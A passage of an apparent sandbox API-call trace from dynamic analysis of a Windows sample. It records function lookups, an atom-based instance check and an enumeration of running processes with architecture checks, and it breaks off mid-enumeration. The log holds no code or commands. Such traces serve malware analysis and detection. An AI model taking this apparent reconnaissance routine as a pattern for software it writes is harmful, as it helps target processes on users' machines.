	[0073.838] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.838] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.838] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.838] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.839] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetLastError () returned 0x5
	[0073.840] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.840] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.840] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.840] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.840] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.840] CloseHandle (hObject=0x224) returned 1
	[0073.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.840] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.841] CloseHandle (hObject=0x224) returned 1
	[0073.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea40, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.841] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.841] CloseHandle (hObject=0x224) returned 1
	[0073.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.878] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dca0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.883] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.883] CloseHandle (hObject=0x224) returned 1
	[0073.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.883] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.883] CloseHandle (hObject=0x224) returned 1
	[0073.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728858, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.884] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.884] CloseHandle (hObject=0x224) returned 1
	[0073.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.884] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.884] CloseHandle (hObject=0x224) returned 1
	[0073.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.884] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.884] CloseHandle (hObject=0x224) returned 1
	[0073.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.884] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.884] CloseHandle (hObject=0x224) returned 1
	[0073.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.885] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.885] CloseHandle (hObject=0x224) returned 1
	[0073.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.885] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.885] CloseHandle (hObject=0x224) returned 1
	[0073.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.885] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.885] CloseHandle (hObject=0x224) returned 1
	[0073.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.885] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.885] CloseHandle (hObject=0x224) returned 1
	[0073.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.885] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.886] CloseHandle (hObject=0x224) returned 1
	[0073.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.886] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.886] CloseHandle (hObject=0x224) returned 1
	[0073.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.886] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.886] CloseHandle (hObject=0x224) returned 1
	[0073.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.887] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.887] CloseHandle (hObject=0x224) returned 1
	[0073.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.887] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.887] CloseHandle (hObject=0x224) returned 1
	[0073.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e6a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.887] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.887] CloseHandle (hObject=0x224) returned 1
	[0073.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.887] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.887] CloseHandle (hObject=0x224) returned 1
	[0073.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.887] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.887] CloseHandle (hObject=0x224) returned 1
	[0073.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.888] CloseHandle (hObject=0x224) returned 1
	[0073.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
